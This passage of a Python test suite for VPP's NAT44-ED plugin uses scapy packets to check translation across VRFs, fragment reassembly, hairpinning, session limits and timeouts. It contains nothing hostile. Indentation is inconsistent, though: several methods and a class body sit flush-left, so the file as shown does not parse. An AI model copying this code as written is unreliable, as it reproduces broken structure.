         IP(src=self.pg5.remote_ip4, dst=self.pg6.remote_ip4) /
         TCP(sport=local_port, dport=12345))
    self.pg5.add_stream(p)
    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    capture = self.pg6.get_capture(1)
    p = capture[0]
    try:
        ip = p[IP]
        tcp = p[TCP]
        self.assertEqual(ip.src, external_addr)
        self.assertEqual(tcp.sport, external_port)
        self.assert_packet_checksums_valid(p)
    except:
        self.logger.error(ppp("Unexpected or invalid packet:", p))
        raise
def test_multiple_vrf_2(self):
    """ Multiple VRF - dynamic NAT from VRF1 to VRF0 (output-feature) """
    external_addr = '1.2.3.4'
    external_port = 80
    local_port = 8080
    # filled in with the dynamically allocated source port below
    port = 0

    self.nat_add_address(self.nat_addr)
    flags = self.config_flags.NAT_IS_INSIDE
    self.vapi.nat44_interface_add_del_output_feature(
        sw_if_index=self.pg1.sw_if_index,
        is_add=1)
    self.vapi.nat44_interface_add_del_feature(
        sw_if_index=self.pg5.sw_if_index,
        is_add=1)
    self.vapi.nat44_interface_add_del_feature(
        sw_if_index=self.pg5.sw_if_index,
        is_add=1, flags=flags)
    flags = self.config_flags.NAT_IS_OUT2IN_ONLY
    self.nat_add_static_mapping(self.pg5.remote_ip4, external_addr,
                                local_port, external_port, vrf_id=1,
                                proto=IP_PROTOS.tcp, flags=flags)

    # dynamic translation VRF1 -> VRF0 via the output feature on pg1
    p = (Ether(src=self.pg5.remote_mac, dst=self.pg5.local_mac) /
         IP(src=self.pg5.remote_ip4, dst=self.pg1.remote_ip4) /
         TCP(sport=2345, dport=22))
    self.pg5.add_stream(p)
    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    capture = self.pg1.get_capture(1)
    p = capture[0]
    try:
        ip = p[IP]
        tcp = p[TCP]
        self.assertEqual(ip.src, self.nat_addr)
        self.assert_packet_checksums_valid(p)
        # record the allocated external source port for the reply
        port = tcp.sport
    except:
        self.logger.error(ppp("Unexpected or invalid packet:", p))
        raise

    # reply from VRF0 is translated back to the VRF1 client
    p = (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
         IP(src=self.pg1.remote_ip4, dst=self.nat_addr) /
         TCP(sport=22, dport=port))
    self.pg1.add_stream(p)
    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    capture = self.pg5.get_capture(1)
    p = capture[0]
    try:
        ip = p[IP]
        tcp = p[TCP]
        self.assertEqual(ip.dst, self.pg5.remote_ip4)
        self.assertEqual(tcp.dport, 2345)
        self.assert_packet_checksums_valid(p)
    except:
        self.logger.error(ppp("Unexpected or invalid packet:", p))
        raise
def test_multiple_vrf_3(self):
    """ Multiple VRF - client in VRF1, service in VRF0 """
    # fix: removed unused locals 'external_addr' and 'port = 0' -
    # this variant maps against the interface address
    # (external_sw_if_index), not a fixed external address
    external_port = 80
    local_port = 8080

    flags = self.config_flags.NAT_IS_INSIDE
    self.vapi.nat44_interface_add_del_feature(
        sw_if_index=self.pg0.sw_if_index,
        is_add=1)
    self.vapi.nat44_interface_add_del_feature(
        sw_if_index=self.pg0.sw_if_index,
        is_add=1, flags=flags)
    self.vapi.nat44_interface_add_del_feature(
        sw_if_index=self.pg6.sw_if_index,
        is_add=1)
    flags = self.config_flags.NAT_IS_OUT2IN_ONLY
    self.nat_add_static_mapping(
        self.pg0.remote_ip4,
        external_sw_if_index=self.pg0.sw_if_index,
        local_port=local_port,
        vrf_id=0,
        external_port=external_port,
        proto=IP_PROTOS.tcp,
        flags=flags
    )

    # from client VRF1 to service VRF0
    p = (Ether(src=self.pg6.remote_mac, dst=self.pg6.local_mac) /
         IP(src=self.pg6.remote_ip4, dst=self.pg0.local_ip4) /
         TCP(sport=12346, dport=external_port))
    self.pg6.add_stream(p)
    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    capture = self.pg0.get_capture(1)
    p = capture[0]
    try:
        ip = p[IP]
        tcp = p[TCP]
        self.assertEqual(ip.dst, self.pg0.remote_ip4)
        self.assertEqual(tcp.dport, local_port)
        self.assert_packet_checksums_valid(p)
    except:
        self.logger.error(ppp("Unexpected or invalid packet:", p))
        raise

    # from service VRF0 back to client VRF1
    p = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
         IP(src=self.pg0.remote_ip4, dst=self.pg6.remote_ip4) /
         TCP(sport=local_port, dport=12346))
    self.pg0.add_stream(p)
    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    capture = self.pg6.get_capture(1)
    p = capture[0]
    try:
        ip = p[IP]
        tcp = p[TCP]
        self.assertEqual(ip.src, self.pg0.local_ip4)
        self.assertEqual(tcp.sport, external_port)
        self.assert_packet_checksums_valid(p)
    except:
        self.logger.error(ppp("Unexpected or invalid packet:", p))
        raise
def test_multiple_vrf_4(self):
    """ Multiple VRF - client in VRF0, service in VRF1 """
    # fix: removed unused local 'port = 0' (never read in this test)
    external_addr = '1.2.3.4'
    external_port = 80
    local_port = 8080

    flags = self.config_flags.NAT_IS_INSIDE
    self.vapi.nat44_interface_add_del_feature(
        sw_if_index=self.pg0.sw_if_index,
        is_add=1)
    self.vapi.nat44_interface_add_del_feature(
        sw_if_index=self.pg0.sw_if_index,
        is_add=1, flags=flags)
    self.vapi.nat44_interface_add_del_feature(
        sw_if_index=self.pg5.sw_if_index,
        is_add=1)
    self.vapi.nat44_interface_add_del_feature(
        sw_if_index=self.pg5.sw_if_index,
        is_add=1, flags=flags)
    flags = self.config_flags.NAT_IS_OUT2IN_ONLY
    self.nat_add_static_mapping(self.pg5.remote_ip4, external_addr,
                                local_port, external_port, vrf_id=1,
                                proto=IP_PROTOS.tcp, flags=flags)

    # from client VRF0 to service VRF1
    p = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
         IP(src=self.pg0.remote_ip4, dst=external_addr) /
         TCP(sport=12347, dport=external_port))
    self.pg0.add_stream(p)
    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    capture = self.pg5.get_capture(1)
    p = capture[0]
    try:
        ip = p[IP]
        tcp = p[TCP]
        self.assertEqual(ip.dst, self.pg5.remote_ip4)
        self.assertEqual(tcp.dport, local_port)
        self.assert_packet_checksums_valid(p)
    except:
        self.logger.error(ppp("Unexpected or invalid packet:", p))
        raise

    # from service VRF1 back to client VRF0
    p = (Ether(src=self.pg5.remote_mac, dst=self.pg5.local_mac) /
         IP(src=self.pg5.remote_ip4, dst=self.pg0.remote_ip4) /
         TCP(sport=local_port, dport=12347))
    self.pg5.add_stream(p)
    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    capture = self.pg0.get_capture(1)
    p = capture[0]
    try:
        ip = p[IP]
        tcp = p[TCP]
        self.assertEqual(ip.src, external_addr)
        self.assertEqual(tcp.sport, external_port)
        self.assert_packet_checksums_valid(p)
    except:
        self.logger.error(ppp("Unexpected or invalid packet:", p))
        raise
def test_multiple_vrf_5(self):
    """ Multiple VRF - forwarding - no translation """
    # fix: removed unused local 'port = 0' (never read in this test)
    external_addr = '1.2.3.4'
    external_port = 80
    local_port = 8080

    self.vapi.nat44_forwarding_enable_disable(enable=1)
    flags = self.config_flags.NAT_IS_INSIDE
    self.vapi.nat44_interface_add_del_feature(
        sw_if_index=self.pg0.sw_if_index,
        is_add=1)
    self.vapi.nat44_interface_add_del_feature(
        sw_if_index=self.pg0.sw_if_index,
        is_add=1, flags=flags)
    self.vapi.nat44_interface_add_del_feature(
        sw_if_index=self.pg5.sw_if_index,
        is_add=1)
    self.vapi.nat44_interface_add_del_feature(
        sw_if_index=self.pg5.sw_if_index,
        is_add=1, flags=flags)
    self.vapi.nat44_interface_add_del_feature(
        sw_if_index=self.pg6.sw_if_index,
        is_add=1)
    flags = self.config_flags.NAT_IS_OUT2IN_ONLY
    self.nat_add_static_mapping(self.pg5.remote_ip4, external_addr,
                                local_port, external_port, vrf_id=1,
                                proto=IP_PROTOS.tcp, flags=flags)
    self.nat_add_static_mapping(
        self.pg0.remote_ip4,
        external_sw_if_index=self.pg0.sw_if_index,
        local_port=local_port,
        vrf_id=0,
        external_port=external_port,
        proto=IP_PROTOS.tcp,
        flags=flags
    )

    # from client to server (both VRF1, no translation)
    p = (Ether(src=self.pg6.remote_mac, dst=self.pg6.local_mac) /
         IP(src=self.pg6.remote_ip4, dst=self.pg5.remote_ip4) /
         TCP(sport=12348, dport=local_port))
    self.pg6.add_stream(p)
    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    capture = self.pg5.get_capture(1)
    p = capture[0]
    try:
        ip = p[IP]
        tcp = p[TCP]
        self.assertEqual(ip.dst, self.pg5.remote_ip4)
        self.assertEqual(tcp.dport, local_port)
        self.assert_packet_checksums_valid(p)
    except:
        self.logger.error(ppp("Unexpected or invalid packet:", p))
        raise

    # from server back to client (both VRF1, no translation)
    p = (Ether(src=self.pg5.remote_mac, dst=self.pg5.local_mac) /
         IP(src=self.pg5.remote_ip4, dst=self.pg6.remote_ip4) /
         TCP(sport=local_port, dport=12348))
    self.pg5.add_stream(p)
    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    capture = self.pg6.get_capture(1)
    p = capture[0]
    try:
        ip = p[IP]
        tcp = p[TCP]
        self.assertEqual(ip.src, self.pg5.remote_ip4)
        self.assertEqual(tcp.sport, local_port)
        self.assert_packet_checksums_valid(p)
    except:
        self.logger.error(ppp("Unexpected or invalid packet:", p))
        raise

    # from server VRF0 to client VRF1 (no translation)
    # NOTE(review): the original labelled this section "from client
    # VRF1 to server VRF0", but the packet sent is pg0 -> pg6 with
    # sport=local_port - i.e. server-to-client, identical to the next
    # section; looks like a copy/paste duplicate - confirm upstream
    p = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
         IP(src=self.pg0.remote_ip4, dst=self.pg6.remote_ip4) /
         TCP(sport=local_port, dport=12349))
    self.pg0.add_stream(p)
    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    capture = self.pg6.get_capture(1)
    p = capture[0]
    try:
        ip = p[IP]
        tcp = p[TCP]
        self.assertEqual(ip.src, self.pg0.remote_ip4)
        self.assertEqual(tcp.sport, local_port)
        self.assert_packet_checksums_valid(p)
    except:
        self.logger.error(ppp("Unexpected or invalid packet:", p))
        raise

    # from server VRF0 back to client VRF1 (no translation)
    p = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
         IP(src=self.pg0.remote_ip4, dst=self.pg6.remote_ip4) /
         TCP(sport=local_port, dport=12349))
    self.pg0.add_stream(p)
    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    capture = self.pg6.get_capture(1)
    p = capture[0]
    try:
        ip = p[IP]
        tcp = p[TCP]
        self.assertEqual(ip.src, self.pg0.remote_ip4)
        self.assertEqual(tcp.sport, local_port)
        self.assert_packet_checksums_valid(p)
    except:
        self.logger.error(ppp("Unexpected or invalid packet:", p))
        raise

    # from client VRF0 to server VRF1 (no translation)
    p = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
         IP(src=self.pg0.remote_ip4, dst=self.pg5.remote_ip4) /
         TCP(sport=12344, dport=local_port))
    self.pg0.add_stream(p)
    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    capture = self.pg5.get_capture(1)
    p = capture[0]
    try:
        ip = p[IP]
        tcp = p[TCP]
        self.assertEqual(ip.dst, self.pg5.remote_ip4)
        self.assertEqual(tcp.dport, local_port)
        self.assert_packet_checksums_valid(p)
    except:
        self.logger.error(ppp("Unexpected or invalid packet:", p))
        raise

    # from server VRF1 back to client VRF0 (no translation)
    p = (Ether(src=self.pg5.remote_mac, dst=self.pg5.local_mac) /
         IP(src=self.pg5.remote_ip4, dst=self.pg0.remote_ip4) /
         TCP(sport=local_port, dport=12344))
    self.pg5.add_stream(p)
    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    capture = self.pg0.get_capture(1)
    p = capture[0]
    try:
        ip = p[IP]
        tcp = p[TCP]
        self.assertEqual(ip.src, self.pg5.remote_ip4)
        self.assertEqual(tcp.sport, local_port)
        self.assert_packet_checksums_valid(p)
    except:
        self.logger.error(ppp("Unexpected or invalid packet:", p))
        raise
def test_outside_address_distribution(self):
    """ Outside address distribution based on source address """

    x = 100
    nat_addresses = []

    # outside pool: 99 consecutive addresses 10.0.0.1 .. 10.0.0.99
    for i in range(1, x):
        a = "10.0.0.%d" % i
        nat_addresses.append(a)

    self.nat_add_inside_interface(self.pg0)
    self.nat_add_outside_interface(self.pg1)

    self.vapi.nat44_add_del_address_range(
        first_ip_address=nat_addresses[0],
        last_ip_address=nat_addresses[-1],
        vrf_id=0xFFFFFFFF, is_add=1, flags=0)

    self.pg0.generate_remote_hosts(x)

    # one UDP packet per inside host, each tagged with a packet-info
    # payload so the sent packet can be matched to the received one
    pkts = []
    for i in range(x):
        info = self.create_packet_info(self.pg0, self.pg1)
        payload = self.info_to_payload(info)
        p = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) /
             IP(src=self.pg0.remote_hosts[i].ip4,
                dst=self.pg1.remote_ip4) /
             UDP(sport=7000+i, dport=8000+i) /
             Raw(payload))
        info.data = p
        pkts.append(p)

    self.pg0.add_stream(pkts)
    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    recvd = self.pg1.get_capture(len(pkts))
    for p_recvd in recvd:
        payload_info = self.payload_to_info(p_recvd[Raw])
        packet_index = payload_info.index
        info = self._packet_infos[packet_index]
        self.assertTrue(info is not None)
        self.assertEqual(packet_index, info.index)
        p_sent = info.data
        packed = socket.inet_aton(p_sent[IP].src)
        numeric = struct.unpack("!L", packed)[0]
        # mirror the data plane's address selection: the source
        # address is byte-swapped before the modulo
        # (NOTE(review): socket.htonl is a no-op on big-endian hosts -
        # confirm this matches the nat44-ed distribution code there)
        numeric = socket.htonl(numeric)
        a = nat_addresses[(numeric-1) % len(nat_addresses)]
        self.assertEqual(
            a, p_recvd[IP].src,
            "Invalid packet (src IP %s translated to %s, but expected %s)"
            % (p_sent[IP].src, p_recvd[IP].src, a))
class TestNAT44EDMW(TestNAT44ED):
""" NAT44ED MW Test Case """
vpp_worker_count = 4
max_sessions = 5000
def test_dynamic(self):
    """ NAT44ED dynamic translation test """
    pkt_count = 1500
    tcp_port_offset = 20
    udp_port_offset = 20
    icmp_id_offset = 20

    self.nat_add_address(self.nat_addr)
    self.nat_add_inside_interface(self.pg0)
    self.nat_add_outside_interface(self.pg1)

    # in2out: snapshot slowpath counters before sending
    tc1 = self.statistics['/nat44-ed/in2out/slowpath/tcp']
    uc1 = self.statistics['/nat44-ed/in2out/slowpath/udp']
    ic1 = self.statistics['/nat44-ed/in2out/slowpath/icmp']
    dc1 = self.statistics['/nat44-ed/in2out/slowpath/drops']

    # bucket packets per worker so each stream is handed to the
    # worker that will own the session (hash by port/id)
    i2o_pkts = [[] for x in range(0, self.vpp_worker_count)]

    for i in range(pkt_count):
        p = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) /
             IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) /
             TCP(sport=tcp_port_offset + i, dport=20))
        i2o_pkts[p[TCP].sport % self.vpp_worker_count].append(p)

        p = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) /
             IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) /
             UDP(sport=udp_port_offset + i, dport=20))
        i2o_pkts[p[UDP].sport % self.vpp_worker_count].append(p)

        p = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) /
             IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) /
             ICMP(id=icmp_id_offset + i, type='echo-request'))
        i2o_pkts[p[ICMP].id % self.vpp_worker_count].append(p)

    for i in range(0, self.vpp_worker_count):
        if len(i2o_pkts[i]) > 0:
            self.pg0.add_stream(i2o_pkts[i], worker=i)

    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    capture = self.pg1.get_capture(pkt_count * 3, timeout=5)

    # each protocol must have taken the slowpath exactly once per
    # packet (new sessions), with zero drops
    if_idx = self.pg0.sw_if_index
    tc2 = self.statistics['/nat44-ed/in2out/slowpath/tcp']
    uc2 = self.statistics['/nat44-ed/in2out/slowpath/udp']
    ic2 = self.statistics['/nat44-ed/in2out/slowpath/icmp']
    dc2 = self.statistics['/nat44-ed/in2out/slowpath/drops']

    self.assertEqual(
        tc2[:, if_idx].sum() - tc1[:, if_idx].sum(), pkt_count)
    self.assertEqual(
        uc2[:, if_idx].sum() - uc1[:, if_idx].sum(), pkt_count)
    self.assertEqual(
        ic2[:, if_idx].sum() - ic1[:, if_idx].sum(), pkt_count)
    self.assertEqual(dc2[:, if_idx].sum() - dc1[:, if_idx].sum(), 0)

    self.logger.info(self.vapi.cli("show trace"))

    # out2in: existing sessions, so the fastpath counters must move
    tc1 = self.statistics['/nat44-ed/out2in/fastpath/tcp']
    uc1 = self.statistics['/nat44-ed/out2in/fastpath/udp']
    ic1 = self.statistics['/nat44-ed/out2in/fastpath/icmp']
    dc1 = self.statistics['/nat44-ed/out2in/fastpath/drops']

    # collect the translated ports/ids actually allocated in2out
    recvd_tcp_ports = set()
    recvd_udp_ports = set()
    recvd_icmp_ids = set()

    for p in capture:
        if TCP in p:
            recvd_tcp_ports.add(p[TCP].sport)
        if UDP in p:
            recvd_udp_ports.add(p[UDP].sport)
        if ICMP in p:
            recvd_icmp_ids.add(p[ICMP].id)

    recvd_tcp_ports = list(recvd_tcp_ports)
    recvd_udp_ports = list(recvd_udp_ports)
    recvd_icmp_ids = list(recvd_icmp_ids)

    # replies target randomly chosen translated ports, again bucketed
    # by the worker that owns the session
    o2i_pkts = [[] for x in range(0, self.vpp_worker_count)]

    for i in range(pkt_count):
        p = (Ether(dst=self.pg1.local_mac, src=self.pg1.remote_mac) /
             IP(src=self.pg1.remote_ip4, dst=self.nat_addr) /
             TCP(dport=choice(recvd_tcp_ports), sport=20))
        o2i_pkts[p[TCP].dport % self.vpp_worker_count].append(p)

        p = (Ether(dst=self.pg1.local_mac, src=self.pg1.remote_mac) /
             IP(src=self.pg1.remote_ip4, dst=self.nat_addr) /
             UDP(dport=choice(recvd_udp_ports), sport=20))
        o2i_pkts[p[UDP].dport % self.vpp_worker_count].append(p)

        p = (Ether(dst=self.pg1.local_mac, src=self.pg1.remote_mac) /
             IP(src=self.pg1.remote_ip4, dst=self.nat_addr) /
             ICMP(id=choice(recvd_icmp_ids), type='echo-reply'))
        o2i_pkts[p[ICMP].id % self.vpp_worker_count].append(p)

    for i in range(0, self.vpp_worker_count):
        if len(o2i_pkts[i]) > 0:
            self.pg1.add_stream(o2i_pkts[i], worker=i)

    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    capture = self.pg0.get_capture(pkt_count * 3)
    for packet in capture:
        try:
            self.assert_packet_checksums_valid(packet)
            self.assertEqual(packet[IP].dst, self.pg0.remote_ip4)
            # translated back into the original port/id range
            if packet.haslayer(TCP):
                self.assert_in_range(
                    packet[TCP].dport, tcp_port_offset,
                    tcp_port_offset + pkt_count, "dst TCP port")
            elif packet.haslayer(UDP):
                self.assert_in_range(
                    packet[UDP].dport, udp_port_offset,
                    udp_port_offset + pkt_count, "dst UDP port")
            else:
                self.assert_in_range(
                    packet[ICMP].id, icmp_id_offset,
                    icmp_id_offset + pkt_count, "ICMP id")
        except:
            self.logger.error(ppp("Unexpected or invalid packet "
                                  "(inside network):", packet))
            raise

    if_idx = self.pg1.sw_if_index
    tc2 = self.statistics['/nat44-ed/out2in/fastpath/tcp']
    uc2 = self.statistics['/nat44-ed/out2in/fastpath/udp']
    ic2 = self.statistics['/nat44-ed/out2in/fastpath/icmp']
    dc2 = self.statistics['/nat44-ed/out2in/fastpath/drops']

    self.assertEqual(
        tc2[:, if_idx].sum() - tc1[:, if_idx].sum(), pkt_count)
    self.assertEqual(
        uc2[:, if_idx].sum() - uc1[:, if_idx].sum(), pkt_count)
    self.assertEqual(
        ic2[:, if_idx].sum() - ic1[:, if_idx].sum(), pkt_count)
    self.assertEqual(dc2[:, if_idx].sum() - dc1[:, if_idx].sum(), 0)

    # total session count equals the number of distinct translated
    # ports/ids observed
    sc = self.statistics['/nat44-ed/total-sessions']
    self.assertEqual(sc[:, 0].sum(), len(recvd_tcp_ports) +
                     len(recvd_udp_ports) + len(recvd_icmp_ids))
def test_frag_in_order(self):
    """ NAT44ED translate fragments arriving in order """
    self.nat_add_address(self.nat_addr)
    self.nat_add_inside_interface(self.pg0)
    self.nat_add_outside_interface(self.pg1)
    # run the in-order fragment scenario once per L4 protocol; the
    # translated port is dynamically allocated, so it is not pinned
    for proto in (IP_PROTOS.tcp, IP_PROTOS.udp, IP_PROTOS.icmp):
        self.frag_in_order(proto=proto, ignore_port=True)
def test_frag_in_order_do_not_translate(self):
    """ NAT44ED don't translate fragments arriving in order """
    self.nat_add_address(self.nat_addr)
    self.nat_add_inside_interface(self.pg0)
    self.nat_add_outside_interface(self.pg1)
    # with forwarding enabled, traffic that matches no session or
    # mapping is passed through untranslated
    self.vapi.nat44_forwarding_enable_disable(enable=True)
    self.frag_in_order(proto=IP_PROTOS.tcp, dont_translate=True)
def test_frag_out_of_order(self):
""" NAT44ED translate fragments arriving out of order """
self.nat_add_address(self.nat_addr)
self.nat_add_inside_interface(self.pg0)
self.nat_add_outside_interface(self.pg1)
self.frag_out_of_order(proto=IP_PROTOS.tcp, ignore_port=True)
self.frag_out_of_order(proto=IP_PROTOS.udp, ignore_port=True)
self.frag_out_of_order(proto=IP_PROTOS.icmp, ignore_port=True)
def test_frag_in_order_in_plus_out(self):
""" NAT44ED in+out interface fragments in order """
in_port = self.random_port()
out_port = self.random_port()
self.nat_add_address(self.nat_addr)
self.nat_add_inside_interface(self.pg0)
self.nat_add_outside_interface(self.pg0)
self.nat_add_inside_interface(self.pg1)
self.nat_add_outside_interface(self.pg1)
# add static mappings for server
self.nat_add_static_mapping(self.server_addr,
self.nat_addr,
in_port,
out_port,
proto=IP_PROTOS.tcp)
self.nat_add_static_mapping(self.server_addr,
self.nat_addr,
in_port,
out_port,
proto=IP_PROTOS.udp)
self.nat_add_static_mapping(self.server_addr,
self.nat_addr,
proto=IP_PROTOS.icmp)
# run tests for each protocol
self.frag_in_order_in_plus_out(self.server_addr,
self.nat_addr,
in_port,
out_port,
IP_PROTOS.tcp)
self.frag_in_order_in_plus_out(self.server_addr,
self.nat_addr,
in_port,
out_port,
IP_PROTOS.udp)
self.frag_in_order_in_plus_out(self.server_addr,
self.nat_addr,
in_port,
out_port,
IP_PROTOS.icmp)
def test_frag_out_of_order_in_plus_out(self):
""" NAT44ED in+out interface fragments out of order """
in_port = self.random_port()
out_port = self.random_port()
self.nat_add_address(self.nat_addr)
self.nat_add_inside_interface(self.pg0)
self.nat_add_outside_interface(self.pg0)
self.nat_add_inside_interface(self.pg1)
self.nat_add_outside_interface(self.pg1)
# add static mappings for server
self.nat_add_static_mapping(self.server_addr,
self.nat_addr,
in_port,
out_port,
proto=IP_PROTOS.tcp)
self.nat_add_static_mapping(self.server_addr,
self.nat_addr,
in_port,
out_port,
proto=IP_PROTOS.udp)
self.nat_add_static_mapping(self.server_addr,
self.nat_addr,
proto=IP_PROTOS.icmp)
# run tests for each protocol
self.frag_out_of_order_in_plus_out(self.server_addr,
self.nat_addr,
in_port,
out_port,
IP_PROTOS.tcp)
self.frag_out_of_order_in_plus_out(self.server_addr,
self.nat_addr,
in_port,
out_port,
IP_PROTOS.udp)
self.frag_out_of_order_in_plus_out(self.server_addr,
self.nat_addr,
in_port,
out_port,
IP_PROTOS.icmp)
def test_reass_hairpinning(self):
""" NAT44ED fragments hairpinning """
server_addr = self.pg0.remote_hosts[1].ip4
host_in_port = self.random_port()
server_in_port = self.random_port()
server_out_port = self.random_port()
self.nat_add_address(self.nat_addr)
self.nat_add_inside_interface(self.pg0)
self.nat_add_outside_interface(self.pg1)
# add static mapping for server
self.nat_add_static_mapping(server_addr, self.nat_addr,
server_in_port, server_out_port,
proto=IP_PROTOS.tcp)
self.nat_add_static_mapping(server_addr, self.nat_addr,
server_in_port, server_out_port,
proto=IP_PROTOS.udp)
self.nat_add_static_mapping(server_addr, self.nat_addr)
self.reass_hairpinning(server_addr, server_in_port, server_out_port,
host_in_port, proto=IP_PROTOS.tcp,
ignore_port=True)
self.reass_hairpinning(server_addr, server_in_port, server_out_port,
host_in_port, proto=IP_PROTOS.udp,
ignore_port=True)
self.reass_hairpinning(server_addr, server_in_port, server_out_port,
host_in_port, proto=IP_PROTOS.icmp,
ignore_port=True)
def test_session_limit_per_vrf(self):
""" NAT44ED per vrf session limit """
inside = self.pg0
inside_vrf10 = self.pg2
outside = self.pg1
limit = 5
# 2 interfaces pg0, pg1 (vrf10, limit 1 tcp session)
# non existing vrf_id makes process core dump
self.vapi.nat44_set_session_limit(session_limit=limit, vrf_id=10)
self.nat_add_inside_interface(inside)
self.nat_add_inside_interface(inside_vrf10)
self.nat_add_outside_interface(outside)
# vrf independent
self.nat_add_interface_address(outside)
# BUG: causing core dump - when bad vrf_id is specified
# self.nat_add_address(outside.local_ip4, vrf_id=20)
stream = self.create_tcp_stream(inside_vrf10, outside, limit * 2)
inside_vrf10.add_stream(stream)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = outside.get_capture(limit)
stream = self.create_tcp_stream(inside, outside, limit * 2)
inside.add_stream(stream)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = outside.get_capture(len(stream))
def test_show_max_translations(self):
""" NAT44ED API test - max translations per thread """
nat_config = self.vapi.nat_show_config_2()
self.assertEqual(self.max_sessions,
nat_config.max_translations_per_thread)
def test_lru_cleanup(self):
""" NAT44ED LRU cleanup algorithm """
self.nat_add_address(self.nat_addr)
self.nat_add_inside_interface(self.pg0)
self.nat_add_outside_interface(self.pg1)
self.vapi.nat_set_timeouts(
udp=1, tcp_established=7440, tcp_transitory=30, icmp=1)
tcp_port_out = self.init_tcp_session(self.pg0, self.pg1, 2000, 80)
pkts = []
for i in range(0, self.max_sessions - 1):
p = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) /
IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4, ttl=64) /
UDP(sport=7000+i, dport=80))
pkts.append(p)
self.pg0.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
self.pg1.get_capture(len(pkts))
self.sleep(1.5, "wait for timeouts")
pkts = []
for i in range(0, self.max_sessions - 1):
p = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) /
IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4, ttl=64) /
ICMP(id=8000+i, type='echo-request'))
pkts.append(p)
self.pg0.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
self.pg1.get_capture(len(pkts))
    def test_session_rst_timeout(self):
        """ NAT44ED session RST timeouts """
        self.nat_add_address(self.nat_addr)
        self.nat_add_inside_interface(self.pg0)
        self.nat_add_outside_interface(self.pg1)
        # short transitory timeout so a reset session expires quickly
        self.vapi.nat_set_timeouts(udp=300, tcp_established=7440,
                                   tcp_transitory=5, icmp=60)
        # establish a TCP session through the NAT
        self.init_tcp_session(self.pg0, self.pg1, self.tcp_port_in,
                              self.tcp_external_port)
        # RST from the inside host; it still passes through (capture 1)
        p = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
             IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) /
             TCP(sport=self.tcp_port_in, dport=self.tcp_external_port,
                 flags="R"))
        self.pg0.add_stream(p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        self.pg1.get_capture(1)
        # wait past the 5s transitory timeout
        self.sleep(6)
        # a new session on different ports must still be creatable
        p = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
             IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) /
             TCP(sport=self.tcp_port_in + 1, dport=self.tcp_external_port + 1,
                 flags="S"))
        self.pg0.add_stream(p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        self.pg1.get_capture(1)
def test_dynamic_out_of_ports(self):
""" NAT44ED dynamic translation test: out of ports """
self.nat_add_inside_interface(self.pg0)
self.nat_add_outside_interface(self.pg1)
# in2out and no NAT addresses added
err_old = self.statistics.get_err_counter(
'/err/nat44-ed-in2out-slowpath/out of ports')
pkts = self.create_stream_in(self.pg0, self.pg1)
self.pg0.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
self.pg1.get_capture(0, timeout=1)
err_new = self.statistics.get_err_counter(
'/err/nat44-ed-in2out-slowpath/out of ports')
self.assertEqual(err_new - err_old, len(pkts))
# in2out after NAT addresses added
self.nat_add_address(self.nat_addr)
err_old = self.statistics.get_err_counter(
'/err/nat44-ed-in2out-slowpath/out of ports')
pkts = self.create_stream_in(self.pg0, self.pg1)
self.pg0.add_stream(pkts)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
capture = self.pg1.get_capture(len(pkts))
self.verify_capture_out(capture, ignore_port=True)
err_new = self.statistics.get_err_counter(
'/err/nat44-ed-in2out-slowpath/out of ports')
self.assertEqual(err_new, err_old)
    def test_unknown_proto(self):
        """ NAT44ED translate packet with unknown protocol """
        self.nat_add_address(self.nat_addr)
        self.nat_add_inside_interface(self.pg0)
        self.nat_add_outside_interface(self.pg1)
        # in2out
        # NOTE(review): the plain TCP packet is sent first, presumably to
        # create NAT state for the inside host before the GRE packet
        # (which carries no port information) arrives — confirm
        p = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) /
             IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) /
             TCP(sport=self.tcp_port_in, dport=20))
        self.pg0.add_stream(p)
